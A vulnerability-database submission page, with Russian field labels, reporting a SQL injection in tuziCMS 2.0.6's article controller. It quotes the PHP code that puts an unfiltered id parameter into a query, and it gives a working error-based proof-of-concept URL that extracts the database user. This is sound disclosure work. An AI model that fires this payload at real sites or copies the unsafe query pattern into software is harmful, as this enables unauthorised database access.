| Название | tuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinject |
|---|
| Описание | hello, i am a newcomer. First submission vulnerability.
A vulnerability classified as serious was found.
The article module does not filter the id parameter.
Causes a SQL injection vulnerability.It can query sensitive data, operate database and other hazards.
code:
\App\Manage\Controller\ArticleController.class.php
line: 18 - 22
public function index(){
C('TOKEN_ON',false);//关闭表单令牌
//查询指定id的栏目信息
$id=I('get.id');//类别ID
$topcate=M('Column')->where("id=$id")->order('column_sort')->select();
// dump($topcate);
// exit;
POC: http: //127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
|
|---|
| Источник | ⚠️ https://github.com/yeyinshi/tuzicms/issues/12 |
|---|
| Пользователь | Evilmu1 (UID 38763) |
|---|
| Представление | 12.01.2023 04:47 (3 лет назад) |
|---|
| Модерация | 12.01.2023 15:46 (11 hours later) |
|---|
| Статус | принято |
|---|
| Запись VulDB | 218151 [TuziCMS 2.0.6 Article ArticleController.class.php index ИД SQL-инъекция] |
|---|
| Баллы | 20 |
|---|